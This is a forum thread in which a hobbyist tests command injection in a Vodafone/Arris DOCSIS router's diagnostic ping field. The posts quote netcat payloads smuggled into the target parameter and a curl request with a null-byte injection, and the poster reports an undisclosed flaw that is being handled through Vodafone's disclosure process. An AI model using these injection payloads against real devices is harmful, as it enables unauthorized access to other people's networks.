(success) Command injection possible!

My ISP send over a new DOCSIS/Router box.
Of course the software on this new device peaked my interest.

They call it “Vodafone Docsis 3.1”, of course it’s some ODM device they rebranded. It’s running firmware version “01.02.068.10.EURO.SIP”.
Edit: I’m fairly certain the device is called Arris VodafoneStation TG344DE. The Intel SOC is called Puma.

I can tell the firmware is still very much in flux by the amount of changes in the Web UI(New features etc.) after the upgrade.

It has this neat about page, and before the automatic & mandatory update it even contained a list of all software versions, and on what CPU they are installed. (It actually runs 2 separate Linux instances; One for the modem, one for the Router). The updated about page removed the CPU info, and only shows certain packages with versions.

As usual, I tried the most basic command injection I can find. It has a diagnostics ping/traceroute web interface. Logically, I send a request using my browser, recorded it using the developer tools, and looked at the data sent. It’s JSON, so it’s easy to modify. The HTTP requests seem to not have any “rolling number” that would make sending out-of-order requests harder.

When I send a address field like “8.8.8.8; nc -lp 1234; #” to test if the address filed is properly escaped, I got back a message like this:

{"Data":{"Target":"parameter value failed validation. matching \/^[A-Za-z0-9:.\\-\\\/]+$\/ against 8.8.8.8; nc -lp 1234; #"}}

Isn’t that interesting? We get the regex we try to exploit for free!
I’m not a regex expert, but it looks to me like it allows the characters “A-Z”, “a-z”, “0-9”, “:”, “\”, “/”.

So, my question is: Can anybody craft an address field that passes these checks, but allows “command injection” of some sort?

I’m fairly certain that they use Bash 3.2.48. If they use the busybox ash, it’s from busybox version 1.22.1 or 1.22

(After the upgrade, busybox shows up twice in the list; My guess is that this is because there are 2 busybox installations for the 2 Linux systems in that router; They removed the info about what version ran on what CPU after a firmware upgrade)

Also, the version of bash seems to be vulnerable to some exploits, but that requires access to an environment variable. Any ideas?

Other, unrelated bits: I’m fairly certain that this device uses an intel x86-based processor internally for some of it’s tasks, Intel is mentioned serveral times in version strings. It even has acpid and powertop installed, and uses systemd for init. The web interface uses PHP Version: 5.4.14. (The older versions seemed to use an even older PHP 3).

11 Likes

hmm, the regex seems pretty safe against command injection.

you got that right. . and - are also allowed.
however, no spaces, so passing futher arguments is limited.

have you tried messing with \0 and \n?

1 Like

I have now played around a little more. I do get some interesting behavior when passing \0 in the address field:

curl 'http://192.168.0.1/php/ajaxSet_status_diagnostic_utility_data.php?_n=82017' \
(...)
--data-binary '{"Type":"PingStart","Data":{"Status":"Requested","Target":"8.8.8.8\0","PingNum":"3","PingInterval":"300","PingSize":"64","PingType":1}}'

I get SUCCESS returned(same as a valid request), and no error regarding invalid characters. In fact, including \0 in the address field seems to always return SUCCESS.

I’ve tried things like "Target":"$(/bin/busybox nc 192.168.0.90 1234)\0", but no luck, it seems like such a value won’t reach the shell?

My guess now is that if any shelling out is done, it’s most likely using the busybox ash. The version of bash that ships with the device is vulnerable to shellshock, so if we can guess where the device shells out to bash, and we can set any environment variable somehow, we might be able to use that.

1 Like

I have managed to get my hands on a firmware image, and was able to extract the root squashfs. Let’s hope some digging in the actual source can help. I really want shell access to these devices. In particular, I’ve heard rumors about the tracking they do, so I want to find out for myself(And maybe remove it?). But also just because it’s fun!

3 Likes

Finally got something!

Without going into detail, a not at all escaped user input value lands in the arguments passed to a shell function.

(Might provide more details later if I’m sure I won’t get into trouble for it!)

BTW, the CPU self-identifies as:

model name : Intel(R) Atom(TM) CPU CE2752  @ 2.00GHz

So, in total it took me less than a day to find a security vulnerability in a system I had never seen before. Cool.

11 Likes

nice!

you are not obliged to, but you should report the vulnerability xP
a quick search showed that Vodafone has a disclosure process:

https://www.vodafone.com/report-a-vulnerability
https://hackerone.com/vodafone

if you decide to share details, i am looking forward to a writeup ^^

3 Likes

I’m not sure about what I read, but seems nice

@m1ckey I already had that site open, and I’m currently working on a detailed writeup.
@anon85095355 The tl;dr: ISP sent over new device. I attempt to find a vulnerability in it. Success in less than a day of 0wning(pardon the pun) the device.

3 Likes

Impressive!

you work in infosec? sysadmin?

Sounds like typical Vodafone to me.

1 Like

No, I’m doing this as a Hobby. Who knows, maybe in the future?

2 Likes

I’d say go for it, you good man

@max1220 Hi, I’m looking into the same router, I’ve been looking at a firmware dump for days now and I’m lost, are you willing to give me a pointer? :slight_smile:
Thank you .

I think I realized what the bug was, correct me if I’m wrong but it’s the wifi country code setting logic. The bug is fixed on the later firmware versions, vodafone pushed a new firmware version 01.02.068.11.EURO.SIP on the same day you discovered the bug, I guess they fixed it the same day.

1 Like

I can’t (yet) tell you much about the bug, other than that it seems unrelated to what you’ve found.

Unfortunately the first thing I tried and described here didn’t work, the issue that I later did find is somewhat unrelated.

I’ve been in contact with Vodafone about this issue, and I’ve tested again today on version 01.02.068.11.EURO.SIP an it’s still there(sorry, no hints).

I’ll post a detailed explanation when this issue is resolved and I get permission to post about it.

2 Likes

Oh then there is still hope :slight_smile: I’ll keep staring at the code :smile: Can you at least confirm that it’s command injection? Not some sort of an code injection(buffer overflow etc…)

No hints, but I can confirm staring at the code works.

2 Likes

Couldn’t figure it out. Maybe something is different between .SIP and .PC20 firmware. I’ll wait till vodafone gets around to fix it and until you can release a write up, I bought an spare tg3442de on ebay so I’ll have one with the old firmware even when vodafone fixes it.

Not sure if this helps, sorry for the necro, but I’ve found a document explaining the versioning scheme they use, maybe this can help someone:

The .SIP and .PC20 are just the telephony signaling types. I didn’t find a EU SIP firmware either, but most relevant code seems to be included in all firmwares.

Unrelated, I’ll definitly still write a post/blog thing about this when this issue is resolved.

1 Like